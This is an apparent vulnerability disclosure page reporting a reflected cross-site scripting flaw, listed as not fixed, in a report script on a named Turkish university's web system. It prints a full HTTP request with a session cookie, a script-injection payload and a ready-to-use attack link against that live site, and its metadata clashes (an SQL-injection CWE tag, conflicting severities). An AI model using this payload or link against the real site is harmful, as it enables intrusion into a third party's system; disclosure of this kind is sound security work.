ÇANAKKALE ONSEKİZ MART ÜNİVERSİTESİ Cross Site Scripting

2020.01.08
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

Name: http://bys.comu.edu.tr/ Cross-site Scripting Vulnerabilities in ERPNext Vendor Homepage: http://bys.comu.edu.tr/ Vulnerability Type: Reflected Cross-site Scripting Severity: High Status: NOTFixed ---------------------------------------------------------------------------------------------------------------------------------------------- Request Headers POST /cdsp/raporlar/rapor_hftdrsprg.php HTTP/1.1 Content-Length: 114 Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=b74d51311432faca30c286e8b1f623d7; ets_ci_sessions=B2cCbgQ3CTUGLwIjUzoJOQE1UTkEc1VyVzRfdFQlBzhSbVM0AVoFbw9qVyNWagVwAWlXNgBhADsGIFIzVjAGYAptATwDMgZnUDNUOFBiDTgHMgJtBDoJOQZgAmdTMwlpATRRZwRoVWVXZ18%2FVGIHaFJnU2MBPAUyD29XI1ZqBXABaVc0AGMAOwYgUmlWcwYNCm0BPQNlBiJQZVQuUCcNLAc9AicEOQk%2BBmYCalMiCTwBM1EtBGBVL1dgXzBUZwd%2FUjNTbgEzBSQPNVdyVmsFMgFjVz8AcQB0BnFSZVZxBg0KbQE%2BA2QGPlB0VH9Qbw19BzwCYQQzCTUGdgIdU28JcgFsUW8EPVVgV35fMlR4B2FSIlNyAWYFaQ9jV3FWMAV3ATpXZwA%2FAGQGOVIgVk4GAQpFARwDIQZpUC5UbVBvDS4HUQI9BG0JawY7AidTcwkoAUtRVwRxVTdXf182VG0Hc1I5UykBPwU3Dz1XO1ZzBW8BMld2ACcAXgZjUmNWdwY7CnoBMAN1BilQIlRmUCcNNAc3AmQEOQktBmUCZVM3CTABMVE7BGlVNVdmXzBUdAdqUn8%3D Host: bys.comu.edu.tr Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* --------------------------------------------------------------------------------------------------------------------------------------------- alert here => bol_kodu=12312&fak_kodu=&sinif=%3Cscript%3Ealert(document.domain);%3C/script%3E ---------------------------------------------------------------------------------------------------------------------------------------------- Full link http://bys.comu.edu.tr//cdsp/raporlar/rapor_hftdrsprg.php?bol_kodu=12312&fak_kodu=&sinif=%3Cscript%3Ealert(document.domain);%3C/script%3E


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top